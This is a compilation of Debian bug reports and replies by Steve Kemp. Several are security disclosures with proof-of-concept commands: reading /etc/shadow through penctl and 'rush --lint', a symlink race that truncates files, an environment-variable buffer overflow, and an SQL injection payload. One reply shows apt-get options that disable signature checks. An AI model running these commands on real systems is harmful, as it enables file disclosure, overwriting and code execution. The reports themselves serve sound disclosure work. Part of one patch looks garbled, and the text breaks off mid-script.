Symlinks are followed, providing the webserve has permission to
write to the file...


File overwrite / disclosure issues in pen
--

Assuming the server is started with a control-socket open then
a user who can contact that socket can create arbitrary files
upon the system:

shelob ~ $ sudo pen  localhost:9000 -C 127.0.0.1:5043
shelob ~ $ penctl 127.0.0.1:5043 write /tmp/meow
shelob ~ $ penctl 127.0.0.1:5043 write /etc/owned
shelob ~ $ ls -l /etc/owned /tmp/meow
-rw-r--r-- 1 root root 1187 Mar 11 18:35 /etc/owned
-rw-r--r-- 1 root root 1186 Mar 11 18:35 /tmp/meow

The files are created as the user who started pen, root in this case,
and although they are not writeable they allow arbitrary overwrites
to occur.



Information Disclosure
---

Again, assuming a control socket was created, invalid commands
are echoed to syslog.

Assuming a local user is member of group `adm` they can read 
/etc/shadow indirectly:


shelob ~ $ sudo pen  localhost:9000 -C 127.0.0.1:5043
shelob ~ $ penctl 127.0.0.1:5043 include /etc/shadow

(NOTE The file is read by the user the server is lauched as,
in this case root.)

Now because we're member of the 'adm' group we can read the
lines that were ignored by pen:

Mar 11 18:30:00 shelob pen: do_cmd: ignoring command starting with 
'root:$6$zwJQWKVo$ofoV2xw0/Wg.rwXXitSyS8/SUUK3PRGp54Sd0VunhVl6W6ekVJlSW8vlqjrdsdwaT58L6Qoosx8IrKsdfsdf5Mxo/:15884:0:9:7:::'



Mitigating factors?  There is no init-script which is supplied
in the debian package, however equally there is no documentation
implying that using a control-socket is dangerous.


*** End of the template - remove these lines ***


-- System Information:
Debian Release: 7.4
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.12-0.bpo.1-amd64 (SMP w/8 CPU cores)
Locale: LANG=en_US.UTF8, LC_CTYPE=en_US.UTF8 (charmap=UTF-8) (ignored: LC_ALL 
set to en_US.UTF8)
Shell: /bin/sh linked to /bin/dash

Versions of packages pen depends on:
ii  libc6  2.13-38+deb7u1

pen recommends no packages.

pen suggests no packages.

-- no debconf information


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#733505: rush: Allows reading arbitrary files

[Steve Kemp]

Package: rush
Version: 1.7+dfsg-1
Severity: important

 From the package description:

"GNU Rush is a restricted shell designed for sites providing only
 limited access to resources for remote users".

  Much like sudo the shell allows a configuration file to limit the
 commands the user(s) are allowed to execute, and again like sudo
 the main binary (/usr/sbin/rush) is installed setuid root.

  Unfortunately the program suffers from the grave flaw that a
 configuration file may be tested via the --lint option, and this
 occurs prior to dropping any privileges.  As the program is
 setuid(root) any file on the system may be read.

  Sample "exploit":

shelob ~ $ rush --lint /etc/shadow 2>&1| head -n 2
rush: Info: /etc/shadow:1: unknown statement: 
root:$6$zwJQWKVo$../Wg.rwXXitSyS8/.../:15884:0:9:7:::
rush: Info: /etc/shadow:2: unknown statement: daemon:*:15884:0:9:7:::

  As you can see the unrecognized content is shown to the user,
 allowing the local user access to the file they otherwise couldn't
 read.  In this case setting up the system for a dictionary attack
 against the password hashes.

  Mitigating factors: Only the first whitespace-separated token
 is shown to the user.

  The identifier CVE-2013-6889 has been assigned to help track
 this security problem across distributions and releases.  Please
 mention it when uploading a fixed package.


-- System Information:
Debian Release: 7.3
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.11.2 (SMP w/8 CPU cores)
Locale: LANG=en_US.UTF8, LC_CTYPE=en_US.UTF8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages rush depends on:
ii  libc6  2.13-38

rush recommends no packages.

Versions of packages rush suggests:
pn  xinetd | inetutils-inetd  

-- no debconf information


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#730189: ruby1.8: CVE-2013-4164

[Steve Kemp]

  The patches seem to work successfully for me:

  * The test-suite that runs at compile-time still passes.
 
  * The reproducer stops segfaulting.

  The reproducer I'm using is:

--
#!/usr/bin/ruby1.8
require 'json'
JSON.parse("[1."+"1"*30+"]")
--

Steve
-- 
http://www.steve.org.uk/

Bug#291844: Info received (gtetrinet: have key for "send special to self")

[Steve Kemp]

  Drop the file attached into ./debian/patches/special-to-self.diff,
 and add it to debian/patches/series.

  et voila.

Steve
--
Index: gtetrinet-0.7.11/src/config.c
===
--- gtetrinet-0.7.11.orig/src/config.c	2013-09-26 20:14:19.0 +0100
+++ gtetrinet-0.7.11/src/config.c	2013-09-26 20:14:22.0 +0100
@@ -72,7 +72,8 @@
 GDK_3,
 GDK_4,
 GDK_5,
-GDK_6
+GDK_6,
+GDK_s
 };
 
 guint keys[K_NUM];
@@ -367,6 +368,14 @@
 else
   keys[K_SPECIAL6] = defaultkeys[K_SPECIAL6];
 
+p = gconf_client_get_string (gconf_client, "/apps/gtetrinet/keys/special_self", NULL);
+if (p)
+{
+  keys[K_SPECIAL_SELF] = gdk_keyval_to_lower (gdk_keyval_from_name (p));
+  g_free (p);
+}
+else
+  keys[K_SPECIAL_SELF] = defaultkeys[K_SPECIAL_SELF];
 
 /* Get the timestamp option. */
 timestampsenable = gconf_client_get_bool (gconf_client, "/apps/gtetrinet/partyline/enable_timestamps", NULL);
@@ -625,6 +634,18 @@
 }
 
 void
+keys_special_self_changed (GConfClient *client,
+   guint cnxn_id,
+   GConfEntry *entry)
+{
+
+  client = client;
+  cnxn_id = cnxn_id;
+
+  keys[K_SPECIAL_SELF] = gdk_keyval_to_lower (gdk_keyval_from_name (gconf_value_get_string (gconf_entry_get_value (entry;
+}
+
+void
 partyline_enable_timestamps_changed (GConfClient *client,
  guint cnxn_id,
  GConfEntry *entry)
Index: gtetrinet-0.7.11/src/config.h
===
--- gtetrinet-0.7.11.orig/src/config.h	2013-09-26 20:14:19.0 +0100
+++ gtetrinet-0.7.11/src/config.h	2013-09-26 20:16:06.0 +0100
@@ -102,6 +102,11 @@
GConfEntry *entry);
 
 void
+keys_special_self_changed (GConfClient *client,
+   guint cnxn_id,
+   GConfEntry *entry);
+
+void
 partyline_enable_timestamps_changed (GConfClient *client,
  guint cnxn_id,
  GConfEntry *entry);
@@ -131,6 +136,7 @@
   K_SPECIAL4,
   K_SPECIAL5,
   K_SPECIAL6,
+  K_SPECIAL_SELF,
 /* not a key but the number of configurable keys */
   K_NUM
 } GTetrinetKeys;
Index: gtetrinet-0.7.11/src/dialogs.c
===
--- gtetrinet-0.7.11.orig/src/dialogs.c	2013-09-26 20:14:19.0 +0100
+++ gtetrinet-0.7.11/src/dialogs.c	2013-09-26 20:14:22.0 +0100
@@ -548,6 +548,7 @@
 actions[K_SPECIAL4] = _("Special to field 4");
 actions[K_SPECIAL5] = _("Special to field 5");
 actions[K_SPECIAL6] = _("Special to field 6");
+actions[K_SPECIAL_SELF] = _("Special to self");
   
 gconf_keys[K_RIGHT]= g_strdup ("/apps/gtetrinet/keys/right");
 gconf_keys[K_LEFT] = g_strdup ("/apps/gtetrinet/keys/left");
@@ -563,6 +564,7 @@
 gconf_keys[K_SPECIAL4] = g_strdup ("/apps/gtetrinet/keys/special4");
 gconf_keys[K_SPECIAL5] = g_strdup ("/apps/gtetrinet/keys/special5");
 gconf_keys[K_SPECIAL6] = g_strdup ("/apps/gtetrinet/keys/special6");
+gconf_keys[K_SPECIAL_SELF] = g_strdup ("/apps/gtetrinet/keys/special_self");
 
 for (i = 0; i < K_NUM; i ++) {
 gtk_list_store_append (keys_store, &iter);
Index: gtetrinet-0.7.11/src/gtetrinet.c
===
--- gtetrinet-0.7.11.orig/src/gtetrinet.c	2013-09-26 20:14:19.0 +0100
+++ gtetrinet-0.7.11/src/gtetrinet.c	2013-09-26 20:14:22.0 +0100
@@ -210,6 +210,10 @@
  (GConfClientNotifyFunc) keys_special6_changed,
 			 NULL, NULL, NULL);
 
+gconf_client_notify_add (gconf_client, "/apps/gtetrinet/keys/special_self",
+ (GConfClientNotifyFunc) keys_special_self_changed,
+NULL, NULL, NULL);
+
 gconf_client_notify_add (gconf_client, "/apps/gtetrinet/partyline/enable_timestamps",
  (GConfClientNotifyFunc) partyline_enable_timestamps_changed,
 			 NULL, NULL, NULL);
Index: gtetrinet-0.7.11/src/tetrinet.c
===
--- gtetrinet-0.7.11.orig/src/tetrinet.c	2013-09-26 20:14:22.0 +0100
+++ gtetrinet-0.7.11/src/tetrinet.c	2013-09-26 20:14:22.0 +0100
@@ -1811,6 +1811,11 @@
 tetris_drawcurrentblock ();
 return TRUE;
 }
+else if (gdk_keyval_to_lower (keyval) == keys[K_SPECIAL_SELF]) {
+   tetrinet_specialkey(playernum);
+tetris_drawcurrentblock ();
+return TRUE;
+}
 tetris_drawcurrentblock ();
 return FALSE;
 }

Bug#291844: gtetrinet: have key for "send special to self"

[Steve Kemp]

  I knocked up a patch to do this, bound to 's' by
 default.

  If there is interest I'm happy to report it here,
 I'm only resisting because this is an 8 year old bug
 and my patch doesn't use quilt.

Steve
-- 
http://www.steve.org.uk/

Bug#714421: fabric: No fabric package in wheezy?

[Steve Kemp]

  I found the jessie package compiled cleanly under
 wheezy and made it available here:

http://packages.steve.org.uk/fabric/

  While I don't necessarily expect you to trust a
 random repository on the internet you can easily
 get the source(s) and rebuild locally.

Steve
-- 
http://www.steve.org.uk/


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#700219: mpc: Playlist numbering is off-by-one

[Steve Kemp]

Package: mpc
Version: 0.19-2
Severity: normal

*** Please type your report below this line ***

I regularly use (via a local emacs mode) the formatting optiona
available in the playlist-display to choose my next song.

This example will make it clear:

* I'm trying to dump all songs in the playlist, along with
  their numbers.

precious ~ $ mpc --format='%id% - %file%' playlist  | head -n 10
0 - Abba/Abba - Dancing Queen.mp3
1 - AC-DC/Back In Black/Hells Bells - AC-DC - Back In Black - 01.mp3
2 - AC-DC/Back In Black/Shoot To Thrill - AC-DC - Back In Black - 02.mp3
3 - AC-DC/Back In Black/What Do You Do For Money Honey- - AC-DC - Back In Black 
- 03.mp3
4 - AC-DC/Back In Black/Givin The Dog A Bone - AC-DC - Back In Black - 04.mp3
5 - AC-DC/Back In Black/Let Me Put My Love Into You - AC-DC - Back In Black - 
05.mp3
6 - AC-DC/Back In Black/Back In Black - AC-DC - Back In Black - 06.mp3
7 - AC-DC/Back In Black/Have A Drink On Me - AC-DC - Back In Black - 08.mp3
8 - AC-DC/Back In Black/Shake A Leg - AC-DC - Back In Black - 09.mp3
9 - AC-DC/Back In Black/Rock And Roll Ain't Noise Pollution - AC-DC - Back In 
Black - 10.mp3


So now I have the ID of each song, and the name.

Let us pretend that song 10 is currently playing.  Let us play song 0:

precious ~ $ mpc play 0
AC-DC - Rock And Roll Ain't Noise Poll
[playing] #10/10246   0:04/4:26 (1%)
volume: n/a   repeat: onrandom: onsingle: off   consume: off

Here you see there is "magic behaviour".  Attempting to play song 0
will show the details for the currently-playing song.  It will not
play song zero.

If I wish to play Abba, the first song in the list above, I must choose
track 1:

precious ~ $ mpc play 1
Abba - Dancing Queen
[playing] #1/10246   0:00/6:33 (0%)
volume: n/a   repeat: onrandom: onsingle: off   consume: off

The conclusion?  The playlist-formatting should start the ID at 1, not
0.

Patch attached:

--- util.c  2013-02-10 00:43:30.0 +
+++ util.c~ 2013-02-10 00:43:22.0 +
@@ -245,7 +245,7 @@
snprintf(buffer, sizeof(buffer), "%d", pos+1);
value = buffer;
} else if (strcmp(name, "id") == 0) {
-   snprintf(buffer, sizeof(buffer), "%u", mpd_song_get_id(song)+1);
+   snprintf(buffer, sizeof(buffer), "%u", mpd_song_get_id(song));
value = buffer;
} else {
enum mpd_tag_type tag_type = mpd_tag_name_iparse(name);

-- System Information:
Debian Release: 6.0.6
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.32-5-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages mpc depends on:
ii  libc6 2.11.3-4   Embedded GNU C Library: Shared lib
ii  libmpdclient2 2.3-1  client library for the Music Playe

mpc recommends no packages.

Versions of packages mpc suggests:
ii  mpd   0.16.7-2   Music Player Daemon

-- no debconf information


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#692490: greed: Insecure use of lockfile in /tmp allows file truncation

[Steve Kemp]

Package: greed
Version: 3.4-2
Severity: normal
Usertags: security

*** Please type your report below this line ***

The setgid(games) binary greed makes insecure use of the
file /tmp/Greed.lock - allow arbitrary files that are
writeable to the games user.

By itself this is not a grave concern, but it might
be leveraged if another game cannot handle an empty
data/save/misc file.

Example of reproducing:


skx@precious:~$ while true; do ln -sf /var/games/omega-rpg/omega.log 
/tmp/Greed.lock; done

In another window launch greed.

Then:

skx@precious:~$ ls /var/games/omega-rpg/ -l
total 4
-rw-rw-r-- 1 root games 301 Jun  1  2008 omega.hi
-rw-rw-r-- 1 root games   0 Nov  6 18:34 omega.log

  The file "omega.log" was truncated.


-- System Information:
Debian Release: 6.0.6
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.32-5-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages greed depends on:
ii  libc6 2.11.3-4   Embedded GNU C Library: Shared lib
ii  libncurses5   5.7+20100313-5 shared libraries for terminal hand

greed recommends no packages.

greed suggests no packages.

-- no debconf information


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#692489: omega-rpg: fails to drop group(games) privileges

[Steve Kemp]

Package: omega-rpg
Version: 1:0.90-pa9-15
Severity: normal
Usertags: security


omega-rpg is installed setgid(games).

There are two cases where it doesn't drop group(games) privileges:

* When creating the help file "omega.doc"

* When writing save-games

Loading the game, and pressing "S" to save a game I get this:

-rw-r--r--   1 skx games  15388 Jun 25 22:50 Omega1000


-- System Information:
Debian Release: 6.0.5
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.32-5-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages omega-rpg depends on:
ii  libc6 2.11.3-3   Embedded GNU C Library: Shared lib
ii  libncurses5   5.7+20100313-5 shared libraries for terminal hand

omega-rpg recommends no packages.

omega-rpg suggests no packages.

-- no debconf information


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#675503: summain: Misc. typos in the manpage.

[Steve Kemp]

Package: summain
Version: 0.13-1
Severity: minor

*** Please type your report below this line ***

Please find below a diff fixing a couple of typos in the manpage.

-- System Information:
Debian Release: 6.0.5
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.32-5-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Steve
-- 
http://tasteful.xxx/

--- summain.1.in-orig   2012-06-01 17:27:01.0 +0100
+++ summain.1.in2012-06-01 17:27:59.0 +0100
@@ -6,11 +6,11 @@
 .B summain
 gathers metadata about files,
 and computes their checksums.
-It is inteded to create a 
+It is intended to create a 
 .I manifest
 of the files.
 The manifest can be used to see if something has changed:
-a new manfest can be created and compared with the old one with
+a new manifest can be created and compared with the old one with
 .BR diff (1).
 .PP
 The manifest looks like this:







-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#651896: Acknowledgement (njam: Insecure usage of environmental variable)

[Steve Kemp]

  Simple patch:

--- src/njam.cpp-orig   2011-12-13 17:06:04.0 +
+++ src/njam.cpp2011-12-13 17:07:08.0 +
@@ -339,7 +339,7 @@
sprintf(linux_sdl_driver, "x11\0");
char *driver_name = getenv("SDL_VIDEODRIVER");
if (driver_name)
-   sprintf(linux_sdl_driver, "%s\0", driver_name);
+   snprintf(linux_sdl_driver, sizeof(linux_sdl_driver)-1, "%s", 
driver_name);
 
if (UseDGA)
{



Steve
-- 
http://edinburgh-portraits.com/



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#651896: njam: Insecure usage of environmental variable

[Steve Kemp]

Package: njam
Version: 1.25-5
Justification: user security hole
Severity: grave
Tags: security

*** Please type your report below this line ***

The setgid(games) binary /usr/games/njam makes insecure use of the 
environmental variable SDL_VIDEODRIVER.

This potentially allows the execution of arbitrary code, as the
following example shows:

1.  Setup the variable:

birthday:~# export SDL_VIDEODRIVER=$(perl -e "print 'x'x300") 


2.  Launch the binary under gdb so we can see what happens:

birthday:~# gdb /usr/games/njam
(gdb) run
Starting program: /usr/games/njam 
..
Program received signal SIGSEGV, Segmentation fault.
0x00404f48 in ?? ()
(gdb) bt
0  0x00404f48 in ?? ()
1  0x7878787878787878 in ?? ()
2  0x7878787878787878 in ?? ()
3  0x7878787878787878 in ?? ()

  0x78 == "x" == Code execution via overflow.


  This is probably a minor issue, but should be simple to patch.

-- System Information:
Debian Release: 6.0.3
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.32-5-amd64 (SMP w/3 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages njam depends on:
ii  libc62.11.2-10   Embedded GNU C Library: Shared lib
ii  libgcc1  1:4.4.5-8   GCC support library
ii  libsdl-image1.2  1.2.10-2+b2 image loading library for Simple D
ii  libsdl-mixer1.2  1.2.8-6.3   mixer library for Simple DirectMed
ii  libsdl-net1.21.2.7-2 network library for Simple DirectM
ii  libsdl1.2debian  1.2.14-6.1  Simple DirectMedia Layer
ii  libstdc++6   4.4.5-8 The GNU Standard C++ Library v3

njam recommends no packages.

njam suggests no packages.

-- no debconf information




-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#635617: nanourl: SQL Injection flaw in URL lookup

[Steve Kemp]

Package: nanourl
Version: 0.1-7.1
Severity: important

*** Please type your report below this line ***

The lookup of destination URLs uses unescaped parameters from
the query string, making a classic SQL Injection security hole.

In real terms this package is not security critical, has a low
user-base, and so I'm only treating it as "important" and not
critical.

Code in question is:

--
   ...
   $hash= $_GET['num'];
   ...

   $result = mysql_query("SELECT url FROM urls WHERE hash = '$hash'");
   if(! ($result)) {
die(mysql_error());
   }

--


Consider the case where "hash" is set to:

  bogus' or urls LIKE '%private%

Leading to a query like:


   SELECT url FROM urls WHERE hash = 'bogus' or urls LIKE '%private%'


CVE ID is probably required :)


-- System Information:
Debian Release: 6.0.2
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.32-5-amd64 (SMP w/3 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash



Steve
--
Let me steal your soul?
http://stolen-souls.com



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#629003: fabric is prone to file-overwrite security issue(s).

[Steve Kemp]

Package: fabric
Version: 0.9.1-1
Justification: causes serious data loss
Severity: important
Tags: security

*** Please type your report below this line ***

Fabric includes two modules which are marked as "contrib", and are
included in the main package.

These two modules both suffer from the same issue:

  * They write files with (semi-)predictable names, in world-readable
and world-writeable locations.

This allows a malicious local-user to pre-create the filenames which
will be used, and allow the overwriting of arbitrary files the user
invoking fabric controls.

The relevant code is included is:

fabric/contrib/projects.py:

 tar_file = "/tmp/fab.%s.tar" % datetime.utcnow().strftime(
 '%Y_%m_%d_%H-%M-%S')
 cwd_name = getcwd().split(sep)[-1]
 tgz_name = cwd_name + ".tar.gz"
 local("tar -czf %s ." % tar_file)


fabric/contrib/files.py:
basename = os.path.basename(filename)
temp_destination = '/tmp/' + basename
...
...
put(tempfile_name, temp_destination)

 [The latter case the upload happens on the *remote* system.]



-- System Information:
Debian Release: 6.0.1
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.32-5-amd64 (SMP w/3 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages fabric depends on:
ii  python  2.6.6-3+squeeze6 interactive high-level object-orie
ii  python-paramiko 1.7.6-5  Make ssh v2 connections with Pytho
ii  python-pkg-resources0.6.14-4 Package Discovery and Resource Acc
ii  python-support  1.0.10   automated rebuilding support for P

fabric recommends no packages.

fabric suggests no packages.

-- no debconf information



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#615292: chronicle: Issues with rendering UTF-8 characters)

[Steve Kemp]

On Sun Feb 27, 2011 at 16:16:48 +0100, Kai Wasserb??ch wrote:

> Steve Kemp schrieb am 27.02.2011 16:01:
> >   I've been careful to open all files in a way which seemed to be
> >  clean - but could you please try the patch below and let me
> >  know if it helps?
> 
> sadly not, I'm still getting "" instead of "??".

  OK in that case can you mail me a copy of your ~/.chroniclerc
 file, gzipped, so that I can try to reproduce it here?

  (I've tested, and had reports of success, that the actual
 *blog entries* are fine in UTF-8 - this is the first time I've
 seen a report of an issue with the ~/.chroniclerc file causing
 problems.)

Steve
-- 
http://www.steve.org.uk/



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#615292: chronicle: Issues with rendering UTF-8 characters)

[Steve Kemp]

On Sun Feb 27, 2011 at 15:50:28 +0100, Kai Wasserb??ch wrote:

> another side effect of this bug is a broken RSS feed,

  Indeed.  If it is broken it will be broken globally.

  I've been careful to open all files in a way which seemed to be
 clean - but could you please try the patch below and let me
 know if it helps?


Steve
-- 
Debian GNU/Linux System Administration
http://www.debian-administration.org/


--- chronicle.orig  2011-02-27 15:00:01.0 +
+++ chronicle   2011-02-27 15:00:23.0 +
@@ -2875,6 +2875,8 @@
 my $line = "";
 
 open my $handle, "<:utf8", $file or die "Cannot read file '$file' - $!";
+binmode( $handle, ":utf8" );
+
 while ( defined( $line = <$handle> ) )
 {
 chomp $line;





-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#612671: A security issue was recently discovered in cgiirc.

[Steve Kemp]

Subject: A security issue was recently discovered in cgiirc.
Package: cgiirc
Version: Security issue in CGI::IRC
Severity: important

*** Please type your report below this line ***

Michael Brooks (Sitewatch) discovered a reflective XSS flaw in
CGI:IRC.

Mozilla have assigned CVE-2011-0050 for this issue; please reference
this in the changelog.

This bug, and issue, corresponds to the recently-released DSA-2158-1


Patch is as follows:
diff --git a/interfaces/nonjs.pm b/interfaces/nonjs.pm
index 9498cb6..72fb0a3 100644
--- a/interfaces/nonjs.pm
+++ b/interfaces/nonjs.pm
@@ -198,10 +198,11 @@ EOF

sub fuserlist {
   my($self, $cgi, $config) = @_;
   +   my $r = _escape($cgi->{R});
   print <
   -

Loading..



-- System Information:
Debian Release: 6.0
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.32-5-amd64 (SMP w/3 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash




-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#610352: security.debian.org: Recent change of advisory subject unhelpful

[Steve Kemp]

On Wed Jan 19, 2011 at 07:27:43 +0100, Thijs Kinkhorst wrote:

> > For the "old" one I see what package is affected whereas for the new
> > one I cannot.
> > 
> > Could you please return to the old subject line?
> 
> I think this is a good point. Maybe not return to the old subject per se, but 
> moving the package name to the start of the subject makes sense to me.

  Seconded.


Steve
-- 
Debian GNU/Linux System Administration
http://www.debian-administration.org/




-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#596212: python-coverage: use externally-packaged jQuery libraries

[Steve Kemp]

On Thu Sep 09, 2010 at 20:49:27 +1000, Ben Finney wrote:

> I've followed the instructions in the README.Debian for ???libjs-jquery???
> to use it from HTML files generated by ???python-coverage???, but without
> success.

  Right, I think your specific use-case is non-standard and doesn't
 really match what the available documentation.

> Using the attribute ???src="/javascript/jquery/jquery.js"??? failed; the
> script silently fails to load. I could onyl get it to work with
> ???src="/usr/share/javascript/jquery/jquery.js"???.

  This makes sense - because you're not expecting to serve the
 file via HTTP, but instead via a local file-system access.

  Your solution is correct:

* Load via filesystem path, rather than by the URL, from beneath
  /usr/share/javascript/.


> What is the expected context for following the instructions in the
> ???libjs-jquery??? README.Debian? Could that document be updated to be
> explicit about what that context is, and perhaps the limitations of
> where that advice holds true?

  In 99% of cases, where the library is intended to be included by a
 file fetched via HTTP, the documentation is correct as-is.

  Its only if you're trying to load jQuery via something that doesn't
 use a web-server, and is instead found on the filesystem, that we
 need to document the solution.

> Rather, the tool generates an HTML report which, in the upstream code,
> gets the jQuery library copied into every such report. The HTML
> documents then reference the jQuery libraries directly from the same
> directory, with the intention that the report directory can be moved
> anywhere, even to a different machine, and still work since the jQuery
> libraries stay with the report.

  To handle that I'd almost suggest making a code-change.  Linking
 /usr/share/javascript/jquery/jquery.js to the directory of the
 output - and then loading  - such
 that if the directory is moved the source still works,.

Steve
--
Let me steal your soul?
http://stolen-souls.com



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#580817: chronicle: List of tagged entries show up in reverse order

[Steve Kemp]

On Sat May 08, 2010 at 18:02:25 -0400, Felipe Sateler wrote:

> When looking at a /tags//, posts are sorted in ascending
> chronological order (older entries first). This should be the other way
> around.

  Please consider using the --recent-tags-first command-line argument,
 or adding that to your chroniclerc file:

   echo "recent-tags-first=1" >> ~/.chroniclerc

Steve
--



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#564829: How to turn off all APT security checking?

[Steve Kemp]

On Sun Feb 07, 2010 at 00:47:10 +0800, jida...@jidanni.org wrote:

> I can't take it any more, day after day various incomplete apt-get
> updates, e.g., bug 564829 and Bug#553533: Seeing BADSIG 9AA38DCD55BE302B
> frequently. What apt-get -o option can I use to turn off all this
> security or whatever checking? It's just too much hassle.

  apt-get -o APT::Get::AllowUnauthenticated=true update
  apt-get -o APT::Get::AllowUnauthenticated=true upgrade

  You can see this option documented in "man apt-get" where you can also
 see "--allow-unauthenticated" documented.

Steve
--
Debian GNU/Linux System Administration
http://www.debian-administration.org/




-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#566106: Fails to run filter

[Steve Kemp]

On Mon Jan 25, 2010 at 14:10:18 +0100, Guido G?nther wrote:
> $ perl test.pl
> 1.  Open a pipe, normally
>   group
>   motd
> 2.  Open a pipe, set the mode
>   group
>   motd
> 3.  Open a handle.
>   group
>   motd
> 4.  Open a handle.  binmode
>   group
>   motd
> 5.  Last ditch.
>   group
>   motd

  So absolutely all of them worked, and none gave any "File not found"
 errors.  I'll update the code to use the modern handle approach (4. in
 that test program) and upload this evening.

  Very odd though..

Steve
--
Debian GNU/Linux System Administration
http://www.debian-administration.org/




-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#566106: Fails to run filter

[Steve Kemp]

On Thu Jan 21, 2010 at 11:08:39 +0100, Guido G??nther wrote:

> Failed to run filter: No such file or directory at /usr/bin/chronicle line 
> 2000.
>  #  Run the command, reading stdout.
>  #
> -open( FILTER, "$cmd|;utf8" ) or
> +open( FILTER, "$cmd|" ) or

  This will work, but means that any non-Latin characters will be lost.

  Can you please try running the sample program attached, and reporting
 the output?  That should be sufficient to tell me which alternative
 I should adopt.

Steve
--
#!/usr/bin/perl -w

use strict;
use warnings;

#
#  1.  Open normally.
#
print "1.  Open a pipe, normally\n";
open( CMD, "/bin/ls /etc/|" )
  or die "1. failed: $!";
while( my $line =  )
{
print "\t$line" if ( $line =~ /(motd|group)$/ );
}
close( CMD );

#
#  2.  Open normally, binmode it.
#
print "2.  Open a pipe, set the mode\n";
